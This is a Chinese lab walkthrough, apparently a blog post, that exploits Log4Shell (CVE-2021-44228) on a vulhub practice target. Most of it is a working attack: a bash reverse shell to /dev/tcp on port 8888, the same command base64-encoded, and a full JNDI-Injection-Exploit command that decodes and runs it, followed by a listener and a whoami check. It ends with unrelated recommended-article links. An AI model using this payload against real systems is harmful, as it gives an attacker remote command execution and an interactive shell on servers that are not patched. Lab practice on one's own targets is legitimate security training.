log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

2.发现端口是8983,浏览器访问http://172.16.1.18:8983/

3.用dnslog平台检测dns回显,看看有没有漏洞存在

4.反弹shell到kali(ip为172.16.1.18)的8888端口

bash -i >& /dev/tcp/172.16.1.18/8888 0>&1

然后对上述命令进行base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.18"

同时,我们开启对172.16.1.18:8888端口监听

输入whoami命令查看是否获得shell

相关推荐
cfm_291414 小时前
SpringBoot MockMvc
spring boot·后端·log4j
天真的银耳汤2 天前
01 静态分析(Static Analysis)
log4j
周杰伦fans23 天前
记一次 Visual Studio 突然报错“未能加载 Microsoft.Internal.VisualStudio.Interop”的奇葩经历
microsoft·log4j·visual studio
laplaya23 天前
C++大型项目组件通信与依赖管理实践
c++·log4j·apache
福大大架构师每日一题24 天前
ollama v0.30.7 正式发布:Hermes 桌面端落地,接口、文档、底层依赖全方位优化
golang·log4j
四问四不知24 天前
Understand Anything的初步了解
log4j
wh_xia_jun1 个月前
单元测试 + Mockito 开发指南
oracle·单元测试·log4j
kTR2hD1qb1 个月前
Privaze源码级避坑指南技术文章大纲
log4j
阿正的梦工坊1 个月前
【Rust】10-Cargo、测试与实用开发工作流
java·rust·log4j
捏塔1 个月前
完美自动生成单元测试SKILL
单元测试·log4j